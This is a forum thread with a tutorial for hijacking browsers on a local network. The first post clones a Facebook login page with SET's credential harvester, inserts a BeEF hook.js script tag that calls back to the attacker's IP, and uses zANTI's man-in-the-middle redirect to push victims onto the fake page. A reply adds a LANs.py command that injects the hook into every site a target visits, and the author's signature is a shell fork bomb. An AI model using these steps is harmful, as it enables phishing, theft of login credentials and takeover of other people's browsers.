Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: Tutorial: Easy Beef-XSS hook

  1. #1
    Junior Member
    Join Date
    Nov 2014
    Location
    Sweden
    Posts
    21

    Tutorial: Easy Beef-XSS hook

    Hi all, just wanted to share something I found useful while pentesting my devices at home, hooking a browser with beef-xss and getting login credentials at the same time.

    Start off by starting SET (Kalimenu -> 6 -> 3 ), then choose options 1, 2, 3, 2 (Credential harvester method) and enter your IP address. Next, choose option 2 and clone a site with a login, I chose for example facebook.

    Next you need to chmod index.html to 755 so people can access your webpage
    Code:
    chmod 755 /var/www/index.html
    .

    Next we'll inject the hook.js code into the index.html file. insert the following after <head> and before </head> .
    Code:
     <script type="text/javascript" src="http://<youripaddress>:3000/hook.js"></script>
    Now is a good time to start up your apache server and launch beef-xss (Kalimenu -> 6 -> 2) and log in to the beef-xss web ui.

    Next we'll start zANTI on your NetHunter device and scan the network. Target the computer you want to hook in the list by clicking on it and then going to "Man in the Middle".
    Press the cogwheel next to "Redirect HTTP" and enter the IP of your device running beef-xss, then enable it. Finally press "on" in the top right corner to enable MITM.

    If you try accessing the internet from the attacked computer now it should automatically load up your fake facebook-site (or whichever site you chose) and the browser should be hooked in beef-xss for further exploits.

    Thanks for reading. And please let me know if there's any errors or if there's any improvements that can be made
    Last edited by unknownpwn; 2014-12-20 at 12:01 PM.
    :(){ :|:& };:

  2. #2
    Member
    Join Date
    Nov 2014
    Posts
    42
    what do you mean by " insert the following after [head] somewhere."

  3. #3
    Junior Member
    Join Date
    Nov 2014
    Location
    Sweden
    Posts
    21
    Quote Originally Posted by ping View Post
    what do you mean by " insert the following after [head] somewhere."
    Insert the code in between the <head> tags (eg, after <head> and before </head> in index.html

  4. #4
    Member
    Join Date
    Nov 2014
    Posts
    42
    Quote Originally Posted by unknownpwn View Post
    Insert the code in between the <head> tags (eg, after <head> and before </head> in index.html
    ok thank you.

  5. #5
    Junior Member
    Join Date
    Nov 2014
    Posts
    16
    That's actually really creative. Great tutorial.

  6. #6
    Junior Member
    Join Date
    Nov 2014
    Location
    Sweden
    Posts
    21
    Quote Originally Posted by C1M7 View Post
    That's actually really creative. Great tutorial.
    Thank you very much
    :(){ :|:& };:

  7. #7
    This is a really great tutorial, thanks a lot!

  8. #8
    Check out LANs.py on github works like...

    ./LANs.py -h [For help]
    ./LANs.py -b http://192.168.0.x:3000/hook.js [ Replace the LAN IP with whatever the network IP is that your given from the router will then should do a scan using nbtscan might need to apt-get install nbtscan pick target ctrl+c type the targets ip in from there it will inject the hook.js into every website the target go's to ]

  9. #9
    Junior Member
    Join Date
    Mar 2015
    Posts
    1
    That's great. Thanks your sharing

  10. #10
    Junior Member
    Join Date
    Sep 2014
    Posts
    11
    a great share
    Thank you very much

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •